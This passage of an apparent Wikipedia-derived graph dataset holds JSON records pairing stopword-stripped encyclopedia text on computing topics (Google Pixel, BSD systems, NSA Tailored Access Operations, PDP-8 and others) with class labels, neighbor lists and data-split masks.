    "text": "Google_Pixel:google pixel google pixel brand consumer electronic devices developed google run either chrome os android operating system pixel brand introduced february 2013 first-generation chromebook pixel pixel line includes laptops tablets smartphones well several accessories google announced first generation pixel smartphones pixel pixel xl october 4 2016 madebygoogle event google emphasized camera two phones ranked best smartphone camera dxomarkmobile 90 points htc released u11 also scored 90 points largely due software optimizations hdr+ pixel phones also include unlimited cloud storage pictures google photos devices purchased directly google unlockable bootloader google announced pixel 2 series consisting pixel 2 pixel 2 xl october 4 2017 google announced pixel 3 pixel 3 xl event october 9 2018 alongside several products devices run android 9 pie may 7 i/o 2019 google announced pixel 3a pixel 3a xl budget alternatives original two pixel 3 devices pixel c announced google event september 29 2015 alongside nexus 5x nexus 6p phones among products pixel c includes usb-c port 3.5 mm headphone jack device shipped android 6.0.1 marshmallow later received android 7.x nougat android 8.x oreo google stopped selling pixel c december 2017 pixel slate 2-in-1 tablet laptop announced google new york city october 9 2018 alongside pixel 3 3 xl pixel slate includes two usb-c ports omits headphone jack device runs chrome os intel kaby lake processors options ranging celeron low end i7 high end june 2019 google announced develop product line cancelled two models development google announced first generation chromebook pixel blog post february 21 2013 laptop includes sd/multi-card reader mini displayport combination headphone/microphone jack two usb 2.0 ports device features include backlit keyboard fully clickable etched glass trackpad integrated stereo speakers two built-in microphones march 11 2015 google announced second generation chromebook pixel blog post laptop includes two usb-c ports two usb 3.0 ports sd card slot combination headphone/microphone jack device also backlit keyboard multi-touch clickable glass trackpad built-in stereo speakers two built-in microphones among features google discontinued 2015 chromebook pixel august 29 2016 october 4 2017 google launched third generation chromebook pixel named google pixelbook made google 2017 event google october 2017 hardware event set wireless earbuds unveiled alongside pixel 2 smartphones earbuds designed phones running android marshmallow higher work google assistant addition audio playback answering calls earbuds support translation 40 languages google translate earbuds able auto pair pixel 2 help google assistant nearby pixel buds available colors black clearly white kinda blue earbuds battery capacity 120 mah charging case comes pixel buds battery capacity 620 mah earbuds priced 159 alongside launch pixelbook october 2017 google announced pixelbook pen stylus used pixelbook pressure sensitivity well support google assistant pen powered replaceable aaaa battery priced us 99 october 2018 google announced pixel stand alongside pixel 3 smartphones addition standard 5 watt qi wireless charging pixel stand wireless 10 watt charging using proprietary technology google also enables software mode pixel 3 allows act smart display similar google home hub",
    "neighbors": [
      4096,
      5637,
      3600,
      5649,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      3633,
      1083,
      10303,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8794,
      8285,
      2658,
      8821,
      4217,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      9913,
      7359,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8921,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      7926,
      3836,
      5892,
      7428,
      8455,
      2828,
      4886,
      280,
      10009,
      4890,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      410,
      1435,
      2978,
      1959,
      424,
      937,
      5546,
      3499,
      6057,
      7595,
      6575,
      4044,
      4048,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8720,
    "label": 3,
    "text": "List_of_ARM_Cortex-M_development_tools:list arm cortex-m development tools list development tools 32-bit arm cortex-m-based microcontrollers consists cortex-m0 cortex-m0+ cortex-m1 cortex-m3 cortex-m4 cortex-m7 cortex-m23 cortex-m33 cores ide compiler linker debugger flashing alphabetical order notes jtag and/or swd debug interface host adapters alphabetical order debugging tools and/or debugging plug-ins alphabetical order commonly referred rtos following free c/c++ libraries",
    "neighbors": [
      7170,
      3462,
      1170,
      659,
      8082,
      9366,
      666,
      5786,
      4508,
      4773,
      38,
      9638,
      4777,
      4139,
      5677,
      2862,
      10419,
      9913,
      8253,
      6207,
      3904,
      8383,
      10945,
      7235,
      9155,
      1221,
      9928,
      2761,
      2635,
      5963,
      8524,
      9163,
      7631,
      4821,
      9685,
      11221,
      4569,
      2524,
      6495,
      1377,
      2788,
      8554,
      9964,
      11374,
      6001,
      2814
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8721,
    "label": 2,
    "text": "FSEvents:fsevents fsevents api macos allows applications register notifications changes given directory tree whenever filesystem changed kernel passes notifications via special device file codice_1 userspace process called codice_2 process combines multiple changes single directory tree occur within short period time notifies applications registered changes affected directory mac os x 10.7 fsevents watch filesystem linux inotify api provided notifications changes individual files application able register receive changes given directory determine file files changed mac os x 10.7 lion added ability register file modification notifications",
    "neighbors": [
      10016,
      2021,
      3692,
      7983,
      823,
      11293
    ],
    "mask": "Test"
  },
  {
    "node_id": 8722,
    "label": 9,
    "text": "Strict_function:strict function function f said strict applied non-terminating expression also fails terminate strict function denotational semantics programming languages function f formula_1 entity formula_2 called bottom denotes expression return normal value either loops endlessly aborts due error division zero function strict called non-strict strict programming language one user-defined functions always strict intuitively non-strict functions correspond control structures operationally strict function one always evaluates argument non-strict function one may evaluate arguments functions one parameter may strict non-strict parameter independently well jointly strict several parameters simultaneously example if-then-else expression many programming languages may thought function three parameters function strict first parameter since function must know whether first argument evaluates true false return non-strict second parameter example false formula_2,1 1 well non-strict third parameter example true,2 formula_2 2 however jointly strict second third parameters since true formula_2 formula_2 formula_2 false formula_2 formula_2 formula_2 non-strict functional programming language strictness analysis refers algorithm used prove strictness function respect one arguments functions compiled efficient calling convention call value without changing meaning enclosing program",
    "neighbors": [
      1952,
      8738,
      3876,
      230,
      8262,
      6536,
      5168,
      5684,
      5081,
      10618,
      3263
    ],
    "mask": "None"
  },
  {
    "node_id": 8723,
    "label": 7,
    "text": "MENTOR_routing_algorithm:mentor routing algorithm mentor routing algorithm algorithm use routing mesh networks specifically pertaining initial topology developed 1991 aaron kershenbaum parviz kermani george a. grove published ieee empirical observation shown complexity class algorithm n² quadratic represents significant improvement currently used algorithms still yielding solutions quality competitive much slower procedures algorithm assumes three things conducive low- cost minimal distance travelled time destinations topology paths tend direct circuitous links high utilization —that used nearly maximum operating capacity long high-capacity links used whenever possible overall plan send traffic direct route source destination whenever magnitude requirement sufficiently large send via path within tree cases former case satisfying three goals -- using direct path high utilization high capacity latter case satisfying least last two objectives aggregating traffic much possible minimum spanning tree traffic flows latter case heuristically defined dijkstra algorithm prim algorithm",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8724,
    "label": 4,
    "text": "Webroot_Internet_Security_Essentials:webroot internet security essentials webroot internet security essentials antivirus antispyware personal firewall security software back-up utility program additional personal pc security features originally launched october 21 2008 webroot internet security essentials first consumer security suite webroot webroot internet security essentials discontinued october 4 2011 webroot announced release secureanywhere™ line products time existing essentials licenses transitioned webroot secureanywhere essentials october 15 2012 product updated webroot secureanywhere® internet security plus latest version webroot secureanywhere internet security plus includes antivirus antispyware anti-phishing personal firewall password identity protection microsoft windows macos computers well protection android ios mobile devices reviews commented lack parental controls included security suite well difficulty configuring firewall",
    "neighbors": [
      2213,
      6797,
      7983,
      2257,
      8753,
      9713,
      8703
    ],
    "mask": "Test"
  },
  {
    "node_id": 8725,
    "label": 2,
    "text": "Comparison_of_BSD_operating_systems:comparison bsd operating systems number unix-like operating systems based descended berkeley software distribution bsd series unix variant options three notable descendants current use freebsd openbsd netbsd derived 386bsd 4.4bsd-lite various routes netbsd freebsd started life 1993 initially derived 386bsd 1994 migrating 4.4bsd-lite code base openbsd forked netbsd 1995 notable derivatives include dragonfly bsd forked freebsd 4.8 apple inc. ios macos darwin base including large amount code derived freebsd current bsd operating systems open source available download free charge bsd license notable exceptions macos ios also generally use monolithic kernel architecture apart macos ios dragonfly bsd feature hybrid kernels various open source bsd projects generally develop kernel userland programs libraries together source code managed using single central source repository past bsd also used basis several proprietary versions unix sun sunos sequent dynix next nextstep dec ultrix osf/1 axp became discontinued tru64 unix parts next software became foundation macos together ios among commercially successful bsd variants general market dragonfly bsd aims inherently easy understand develop multi-processor infrastructures main goal project forked freebsd 4.8 radically change kernel architecture introducing microkernel-like message passing enhance scaling reliability symmetric multiprocessing smp platforms also applicable numa clustered systems long-term goal provide transparent single system image clustered environments dragonfly bsd originally supported ia-32 x86-64 platforms however support ia-32 dropped version 4.0 matthew dillon founder dragonfly bsd believes supporting fewer platforms makes easier project proper ground-up smp implementation freebsd aims make operating system usable purpose intended run wide variety applications easy use contain cutting edge features highly scalable high load network servers freebsd free software project prefers freebsd license however sometimes accept non-disclosure agreements ndas include limited number nonfree hardware abstraction layer hal modules specific device drivers source tree support hardware companies provide purely libre drivers hals program software-defined radios vendors share nonfree algorithms maintain high level quality provide good support production quality commercial off-the-shelf cots workstation server high-end embedded systems freebsd focuses narrow set architectures significant focus development since 2000 fine-grained locking smp scalability 2007 kernel fine-locked scaling improvements started seen recent work includes common criteria security functionality mandatory access control security event audit support derivatives netbsd aims provide freely redistributable operating system professionals hobbyists researchers use manner wish main focus portability use clear distinctions machine-dependent machine-independent code runs wide variety 32-bit 64-bit processor architectures hardware platforms intended interoperate well operating systems netbsd places emphasis correct design well-written code stability efficiency practical close compliance open api protocol standards also aimed june 2008 netbsd foundation moved two-clause bsd license citing changes ucb industry applicability npf project spawned netbsd openbsd security-focused bsd known developers insistence extensive ongoing code auditing security correct functionality secure default philosophy good documentation adherence strictly open source licensing system incorporates numerous security features absent optional versions bsd openbsd policy openness extends hardware documentation drivers since without trust correct operation kernel security vendor software bugs would hard resolve openbsd emphasizes high standards areas security policies include disabling non-essential services sane initial settings integrated cryptography originally made easier due relaxed canadian export laws relative united states full public disclosure security flaws discovered thoroughly auditing code bugs security issues various security features including w^x page protection technology heavy use randomization mitigate attacks coding approaches include emphasis searching similar issues throughout code base code issue identified concerning software freedom openbsd prefers bsd isc license gpl acceptable existing software impractical replace gnu compiler collection ndas never considered acceptable common parent netbsd openbsd strives run wide variety hardware licenses conflict openbsd philosophy openbsd team re-implemented major pieces software scratch often become standard used within versions bsd examples include pf packet filter new privilege separation techniques used safeguard tools tcpdump tmux much openssh codebase replacing gpl licensed tools diff grep pkg-config isc bsd licensed equivalents openbsd prominently notes success security approach website home page two vulnerabilities ever found default install openssh vulnerability found 2002 remote network vulnerability found 2007 period almost 22 years according openbsd expert michael w. lucas openbsd widely regarded secure operating system available anywhere licensing terms openbsd spawned numerous child projects openssh openntpd openbgpd opensmtpd pf carp libressl many designed replace restricted alternatives derivatives september 2005 bsd certification group advertising number mailing lists surveyed 4,330 bsd users 3,958 took survey english assess relative popularity various bsd operating systems 77 respondents used freebsd 33 used openbsd 16 used netbsd 2.6 used dragonfly 6.6 used potentially non-bsd systems languages offered brazilian european portuguese german italian polish note control group pre-screening survey takers checked asked specify operating system survey takers permitted select one answer percentages shown graph number survey participants add greater 100 survey taker filled one choice still counted one vote chart another attempt profile worldwide bsd usage *bsdstats project whose primary goal demonstrate hardware vendors penetration bsd viability hardware drivers operating system project collects data monthly bsd system administrators willing participate currently records bsd market share participating freebsd openbsd netbsd dragonflybsd debian gnu/kfreebsd trueos mirbsd systems distrowatch well known linux community often used rough guide free operating system popularity publishes page hits linux distributions operating systems covers 4 september 2016 using data span last six months placed freebsd 21st place 479 hits per day trueos 46th place 244 hits per day ghostbsd 47th place 242 hits openbsd 75th place 163 hits per day midnightbsd 118th place 89 hits per day netbsd 142nd place 66 hits per day names freebsd openbsd references software freedom cost open source netbsd name tribute internet brought original developers together first bsd mascot bsd daemon named common type unix software program daemon freebsd still uses image red cartoon daemon named beastie wielding pitchfork mascot today 2005 competition stylized version beastie head designed drawn anton gural chosen freebsd logo freebsd slogan power serve netbsd flag designed 2004 grant bisset inspired original netbsd logo designed 1994 shawn mueller portraying number bsd daemons raising flag top mound computer equipment based world war ii photograph raising flag iwo jima board directors netbsd foundation believed complicated hard reproduce negative cultural ramifications thus suitable image netbsd corporate world new simpler flag design replaced netbsd slogan course runs netbsd referring operating system portability originally openbsd used bsd daemon mascot sometimes added halo distinguishing mark openbsd later replaced bsd daemon puffy although puffy usually referred pufferfish spikes cartoon images give closer likeness porcupinefish logo reference fish defensive capabilities blowfish cryptography algorithm used openssh openbsd also number slogans including secure default used first openbsd song e-railed free functional secure openbsd released least one original song every release since 3.0 dragonfly bsd logo designed joe angrisano dragonfly named fred number unofficial logos various authors also show dragonfly stylized versions dragonfly bsd considers logical continuation freebsd 4.x series fireflybsd similar logo firefly showing close relationship dragonfly bsd fact fireflybsd website states proceeds sales go development dragonfly bsd suggesting two may fact closely related picobsd slogan little bsd us logo includes version freebsd beastie child showing close connection freebsd minimal amount code needed run live cd number bsd oses use stylized version respective names logos includes macos trueos ghostbsd desktopbsd closedbsd microbsd trueos slogan personal computing served bsd style ghostbsd simple secure bsd served desktop desktopbsd step towards bsd desktop microbsd slogan small secure unix like os miros site collects variety bsd mascots tux linux mascot together illustrating project aim supporting bsd linux kernels miros slogan wonderful operating system world peace",
    "neighbors": [
      10761,
      2061,
      9743,
      3603,
      7187,
      4117,
      1080,
      5177,
      9784,
      576,
      7234,
      3651,
      7748,
      3142,
      7249,
      4695,
      9306,
      607,
      10851,
      9320,
      5230,
      10862,
      8304,
      118,
      633,
      7802,
      8316,
      9342,
      7806,
      1150,
      6787,
      4745,
      8344,
      3241,
      684,
      3248,
      1718,
      6333,
      10436,
      2245,
      9927,
      8904,
      8395,
      6361,
      6369,
      5356,
      9452,
      2292,
      5380,
      5384,
      2825,
      6412,
      5397,
      1304,
      10016,
      1316,
      2345,
      4908,
      1839,
      7983,
      823,
      7483,
      850,
      5970,
      11604,
      6491,
      873,
      5492,
      2424,
      7552,
      5506,
      1927,
      10631,
      7057,
      5534,
      3487,
      5029,
      11689,
      11184,
      2995,
      8627,
      9141,
      9151,
      9153,
      9665,
      10202,
      3551,
      7139,
      4071,
      3058
    ],
    "mask": "Test"
  },
  {
    "node_id": 8726,
    "label": 4,
    "text": "Tailored_Access_Operations:tailored access operations office tailored access operations tao computer network operations structured s32 cyber-warfare intelligence-gathering unit national security agency nsa active since least circa 1998 tao identifies monitors infiltrates gathers intelligence computer systems used entities foreign united states tao reportedly largest arguably important component nsa huge signals intelligence directorate sid sigint consisting 1,000 military civilian computer hackers intelligence analysts targeting specialists computer hardware software designers electrical engineers snowden leak document leaked former nsa contractor edward snowden describing unit work says tao software templates allowing break commonly used hardware including routers switches firewalls multiple product vendor lines tao engineers prefer tap networks rather isolated computers typically many devices single network tao headquarters termed remote operations center roc based nsa headquarters fort meade maryland tao also expanded nsa hawaii wahiawa oahu nsa georgia fort gordon georgia nsa texas san antonio texas nsa colorado buckley air force base denver details program titled quantumsquirrel indicate nsa ability masquerade routable ipv4 ipv6 host enables nsa computer generate false geographical location personal identification credentials accessing internet utilizing quantumsquirrel nsa ant catalog 50-page classified document listing technology available united states national security agency nsa tailored access operations tao advanced network technology ant division aid cyber surveillance devices described already operational available us nationals members five eyes alliance according der spiegel released catalog public december 30 2013 list reads like mail-order catalog one nsa employees order technologies ant division tapping targets data document created 2008 security researcher jacob appelbaum gave speech chaos communications congress hamburg germany detailed techniques simultaneously published der spiegel article coauthored disclosed catalog tao developed attack suite call quantum relies compromised router duplicates internet traffic typically http requests go intended target nsa site indirectly nsa site runs foxacid software sends back exploits load background target web browser intended destination chance respond unclear compromised router facilitates race return trip prior development technology foxacid software made spear-phishing attacks nsa referred spam browser exploitable permanent implants rootkits etc deployed target computer e.g olympusfire windows give complete remote access infected machine type attack part man-in-the-middle attack family though specifically called man-on-the-side attack difficult pull without controlling internet backbone numerous services foxacid exploit way names foxacid modules given collaboration british government communications headquarters gchq muscular google services could attacked including gmail finding machines exploitable worth attacking done using analytic databases xkeyscore specific method finding vulnerable machines interception windows error reporting traffic logged xkeyscore quantum attacks launched nsa sites slow combinations targets services essentially try exploit race condition i.e nsa server trying beat legitimate server response mid-2011 nsa prototyping capability codenamed qfire involved embedding exploit-dispensing servers virtual machines running vmware esx hosted closer target so-called special collection sites scs network worldwide goal qfire lower latency spoofed response thus increasing probability success commendeer used commandeer i.e compromise untargeted computer systems software used part quantumnation also includes software vulnerability scanner validator tool first described 2014 chaos communication congress jacob appelbaum characterized tyrannical quantumcookie complex form attack used tor users according 2013 article foreign policy tao become increasingly accomplished mission thanks part high-level cooperation secretly receives 'big three american telecom companies verizon sprint large us-based internet service providers many top computer security software manufacturers consulting companies 2012 tao budget document claims companies tao behest insert vulnerabilities commercial encryption systems systems networks endpoint communications devices used targets number us companies including cisco dell subsequently made public statements denying insert back doors products microsoft provides advance warning nsa vulnerabilities knows fixes information vulnerabilities available public enables tao execute so-called zero-day attacks microsoft official declined identified press confirmed indeed case said microsoft held responsible nsa uses advance information since 2013 head tao rob joyce 25-plus year employee previously worked nsa information assurance directorate iad january 2016 joyce rare public appearance gave presentation usenix ’ enigma conference",
    "neighbors": [
      1024,
      10756,
      9233,
      9750,
      535,
      9761,
      4644,
      4133,
      6184,
      1589,
      11335,
      1608,
      3657,
      8779,
      7759,
      3154,
      8276,
      91,
      4703,
      8288,
      2148,
      2661,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      10392,
      2717,
      9375,
      1189,
      9900,
      9904,
      6834,
      9395,
      8886,
      5308,
      6343,
      6344,
      3789,
      7887,
      4304,
      7893,
      4314,
      9435,
      3807,
      5349,
      1254,
      3305,
      10477,
      9460,
      4863,
      2815,
      3843,
      10502,
      10003,
      8489,
      11052,
      9517,
      1838,
      9518,
      6484,
      857,
      1882,
      5986,
      3944,
      2419,
      3956,
      6005,
      1400,
      9082,
      6017,
      11152,
      10132,
      1440,
      5024,
      3495,
      11175,
      5547,
      1970,
      441,
      1979,
      4027,
      7101,
      1986,
      7119,
      4054,
      9688,
      991,
      1504,
      7137,
      9186,
      10208,
      7145,
      2542,
      4595,
      6136,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 8727,
    "label": 3,
    "text": "GnuLinEx:gnulinex gnulinex linex debian-based operating system uses gnome desktop initiative regional government extremadura spain gnulinex intended used schools extremadura well official institutions actively promoted business home use well gnulinex compatible computers based i386 architecture aim project promotion technologically literate information-based society order improve citizens quality life extremadura changed names many programs installed default distribution caused confusion amongst users see virtue helping remember favorite applications spanish instead english names 2004 version includes possibility choosing original icons names applications included gnulinex school linex gnulinex variant oriented toward teachers consists three user profiles profile personalised particular student content software pupil",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      4123,
      8476,
      10780,
      926,
      543,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      823,
      439,
      56,
      59,
      2623,
      3903,
      4673,
      10687,
      2375,
      4039,
      5962,
      8907,
      11388,
      1110,
      9693,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      9324,
      7534,
      2671,
      7920,
      8177,
      9074,
      7027,
      10860,
      9461,
      6393,
      3068,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 8728,
    "label": 9,
    "text": "Arc_(programming_language):arc programming language arc programming language dialect language lisp developed paul graham robert morris free open-source software released artistic license 2.0 2001 paul graham announced working new dialect lisp named arc years since written several essays describing features goals language internal projects graham startup business incubator named combinator written arc notably hacker news web forum news aggregator program arc written racket essay popular graham describes goals language many goals general arc hackable good libraries give specifics example believes important language terse also stated better language implement small number axioms even means language may features large organizations want object-orientation oo graham thinks oo useful methods patterns good design views language features used implement oo partly mistaken arc introduction 2008 graham stated one benefits brevity controversy among lisp programmers whether much s-expressions language complemented forms syntax graham thinks added syntax used situations pure s-expressions would overly verbose saying n't think religiously opposed introducing syntax lisp graham also thinks efficiency problems solved giving programmer good profiler released 2008 arc generated mixed reactions calling simply extension lisp scheme programming language right others applauded arc stripping lisp bare essentials shortly release arc ported javascript supported schemescript integrated development environment ide based eclipse hello world arc illustrate arc terseness graham uses brief program produces form one field url /said form submitted leads page link says click leads page value original input field first publicly released version arc made available 29 january 2008 implemented racket named plt-scheme release comes form .tar archive containing racket source code arc tutorial discussion forum also available forum uses program hacker news written arc due lack updates official arc branch members arc community started repositories unofficial modifications extensions libraries one version anarki permitted anyone submit changes project community managed wiki rainbow implementation arc java arcadia implementation arc c",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      4633,
      4122,
      8226,
      5677,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      3462,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8729,
    "label": 6,
    "text": "Del_(command):del command computing codice_1 codice_2 command command-line interpreters shells codice_3 codice_4 4dos ndos 4os2 4nt windows powershell used delete one files directories file system command available various operating systems including dos microware os-9 ibm os/2 microsoft windows reactos analogous unix codice_5 command stratus openvos codice_6 codice_7commands dec rt-11 rsx-11 os/8 openvms also provide codice_8 command contracted codice_1 amigados tsc flex provide codice_8 command well ms-dos command available versions 1 later also available open-source ms-dos emulator dosbox dr-dos supports codice_1 codice_2 well also supports shorthand form codice_13 derived cp/m addition dr-dos command processor also supports codice_14/codice_15 shorthand forms codice_1/codice_13/codice_2 command assumed codice_19 parameter 'query given well theos/oasis flexos provide codice_2 command powershell codice_1 codice_2 predefined command aliases codice_23 cmdlet basically serves purpose",
    "neighbors": [
      2432,
      3970,
      7939,
      8834,
      4870,
      10631,
      2568,
      1801,
      6281,
      8713,
      1804,
      6797,
      3856,
      273,
      6674,
      532,
      4248,
      7325,
      4001,
      9762,
      4771,
      7847,
      808,
      9643,
      8876,
      7983,
      7088,
      8369,
      178,
      9907,
      9780,
      10033,
      4409,
      1978,
      6329,
      6459,
      5437,
      7356,
      7486,
      960,
      10428,
      10564,
      8517,
      8902,
      1741,
      2637,
      4174,
      9166,
      978,
      1750,
      9946,
      10590,
      5603,
      5220,
      1253,
      2534,
      10727,
      6120,
      6506,
      621,
      8301,
      1647,
      9709,
      2545,
      4850,
      7411,
      5492,
      8692,
      9839,
      11249,
      3323,
      6396,
      8831
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8730,
    "label": 3,
    "text": "BTX_(form_factor):btx form factor btx balanced technology extended form factor motherboards originally intended replacement aging atx motherboard form factor late 2004 early 2005 designed alleviate issues arose using newer technologies often demand power create heat motherboards compliant circa 1996 atx specification atx btx standards proposed intel however future development btx retail products intel canceled september 2006 following intel decision refocus low-power cpus suffering scaling thermal issues pentium 4 first company implement btx gateway inc followed dell mpc first generation apple mac pro used elements btx design system well btx-compliant instead using proprietary form factor pico btx motherboard form factor meant miniaturize btx standard pico btx motherboards measure smaller many current micro -sized motherboards hence name pico motherboards share common top half sizes btx line support one two expansion slots designed half-height riser card applications smaller btx sizes include micro btx nano btx heat sink attached cpu called thermal module throughout official specification longer attached solely motherboard casing inertial load mass mechanical shock event longer damage motherboard structural interface heat sink chassis defined 4 mounting holes distances 4.4 × 2.275 55.79 × 111.76 mm one another since attachment means also required certain stiffness called support retention module srm specification first months production atx btx motherboards similar moving btx motherboard atx case possible vice versa possible first btx motherboards atx motherboards turned upside except component location really btx positioning later btx form factor big change turning mirror image atx standard since new motherboard design standards incompatible basically btx motherboards 'leftside-right compared atx upside-down i.e mounted opposite side case computer cases cooler master series stackers released support varying range motherboard standards atx btx mini-atx forth ease motherboard upgrade without buying new case however connector slot standards identical including pci e cards processors ram hard drives etc btx power supply units exchanged newer atx12v units older atx power supplies n't extra 4-pin 12v connector introduced atx12v standard btx form factor widely adopted despite improvements atx related standards result availability variety btx-compatible components limited one reason failure btx gain traction key markets rise energy-efficient components cpus chipsets gpus require less power produce less waste heat eliminating two primary intended benefits btx another reason lack oem adopters initially gateway dell offered computers new format later hp fujitsu-siemens fujitsu also offered btx-based computers manufacturers stayed atx standard even handful manufacturers adopt btx products continued produce bulk machines atx form factor",
    "neighbors": [
      10337,
      8035,
      2500,
      455,
      7113,
      4270,
      7151,
      10095,
      2161,
      2803,
      10715,
      1400,
      8090,
      9307,
      3037
    ],
    "mask": "Train"
  },
  {
    "node_id": 8731,
    "label": 4,
    "text": "Client_Puzzle_Protocol:client puzzle protocol client puzzle protocol cpp computer algorithm use internet communication whose goal make abuse server resources infeasible implementation proof-of-work system pow idea cpp require clients connecting server correctly solve mathematical puzzle establishing connection server attack solving puzzle client would return solution server server would quickly verify reject drop connection puzzle made simple easily solvable requires least minimal amount computation client side legitimate users would experience negligible computational cost abuse would deterred clients try simultaneously establish large number connections would unable computational cost time delay method holds promise fighting types spam well attacks like denial-of-service",
    "neighbors": [
      4490,
      3964,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8732,
    "label": 3,
    "text": "PDP-8:pdp-8 pdp-8 12-bit minicomputer produced digital equipment corporation dec first commercially successful minicomputer 50,000 examples sold model lifetime basic design follows pioneering linc smaller instruction set expanded version pdp-5 instruction set similar machines dec pdp-12 modernized version pdp-8 linc concepts pdp-14 industrial controller system earliest pdp-8 model informally known straight-8 introduced 22 march 1965 priced 18,500 used diode–transistor logic packaged flip chip cards machine size small household refrigerator first computer sold 20,000 making best-selling computer history time straight-8 supplanted 1966 pdp-8/s available desktop rack-mount models using one-bit serial arithmetic logic unit alu allowed pdp-8/s smaller less expensive although slower original pdp-8 basic 8/s sold 10,000 first machine reach milestone later systems pdp-8/i /l pdp-8/e /f /m pdp-8/a returned faster fully parallel implementation use much less costly transistor–transistor logic ttl msi logic surviving pdp-8s era pdp-8/e common well-regarded many types i/o devices available last commercial pdp-8 models introduced 1979 called cmos-8s based cmos microprocessors priced competitively offering failed intersil sold integrated circuits commercially 1982 intersil 6100 family virtue cmos technology low power requirements used embedded military systems chief engineer designed initial version pdp-8 edson de castro later founded data general pdp-8 combines low cost simplicity expandability careful engineering value greatest historical significance pdp-8 low cost high volume made computer available many new customers many new uses continuing significance historical example value-engineered computer design low complexity brought costs made programming cumbersome seen examples article discussion pages fields much one code performed required mechanics opposed setting algorithm example subtracting number involves computing two complement adding writing conditional jump involves writing conditional skip around jump skip coding condition negative one desired ambitious programming projects failed fit memory developed design defects could solved example noted inadvertent recursion subroutine produces defects difficult trace subroutine question design advances reduced costs logic memory programmer time became relatively important subsequent computer designs emphasized ease programming typically using larger intuitive instruction sets eventually machine code generated compilers report generators reduced instruction set computer returned full-circle pdp-8 emphasis simple instruction set achieving multiple actions single instruction cycle order maximize execution speed although newer computers much longer instruction words pdp-8 used ideas several 12-bit predecessors notably linc designed w.a clark c.e molnar inspired seymour cray cdc 160 minicomputer pdp-8 uses 12 bits word size arithmetic unsigned integers 0 4095 signed integers -2048 +2047 however software multiple-precision arithmetic interpreter available floating point operations example used 36-bit floating point representation two-word 24-bit mantissa one-word exponent subject speed memory limitations pdp-8 perform calculations similar expensive contemporary electronic computers ibm 1130 various models ibm system/360 easier interface external devices memory address space also 12 bits pdp-8 basic configuration main memory 4,096 2 twelve-bit words optional memory-expansion unit switch banks memories using iot instruction memory magnetic-core memory cycle time 1.5 microseconds 0.667 mhz typical two-cycle fetch execute memory-reference instruction runs speed 0.333 mips 1974 pocket reference card pdp-8/e gives basic instruction time 1.2 microseconds 2.6 microseconds instructions reference memory pdp-8 designed part handle contemporary telecommunications text six-bit character codes widespread use time pdp-8 twelve-bit words efficiently store two characters addition six-bit teleprinter code called teletypesetting tts code widespread use news wire services early application pdp-8 typesetting using code later 7-bit ascii 8-bit utf-8 character codes developed part response limitations five- six-bit character codes pdp-8 instructions 3-bit opcode eight instructions assembler provides instruction mnemonics programmer translating i/o operate-mode instructions combinations op-codes instruction fields also three programmer-visible registers 12-bit accumulator ac program counter pc carry flag called link register l input output pdp-8 single interrupt shared devices i/o bus accessed i/o instructions direct memory access dma channel programmed i/o bus typically runs low medium-speed peripherals printers teletypes paper tape punches readers dma used cathode ray tube screens light pen analog-to-digital converters digital-to-analog converters tape drives disk drives save money design used inexpensive main memory many purposes served expensive flip-flop registers computers auxiliary counters subroutine linkage basic models use software multiplication division faster math extended arithmetic element eae provides multiply divide instructions additional register multiplier/quotient mq register eae option original pdp-8 8/i 8/e integral part intersil 6100 microprocessor pdp-8 optimized simplicity design compared complex machines unnecessary features removed logic shared possible instructions use autoincrement autoclear indirect access increase software speed reduce memory use substitute inexpensive memory expensive registers electronics basic pdp-8 cpu four 12-bit registers accumulator program counter memory-buffer register memory-address register save money served multiple purposes different points operating cycle example memory buffer register provides arithmetic operands part instruction register stores data rewrite core memory restores core data destroyed read simplicity early pdp-8 models less expensive commercially available computers however used costly production methods often used prototypes used thousands small standardized logic-modules gold connectors integrated costly complex wire-wrapped backplane large cabinet later 8/s model two different logic voltages increased fan-out inexpensive diode–transistor logic 8/s also reduced number logic gates using serial single-bit-wide data path arithmetic cpu 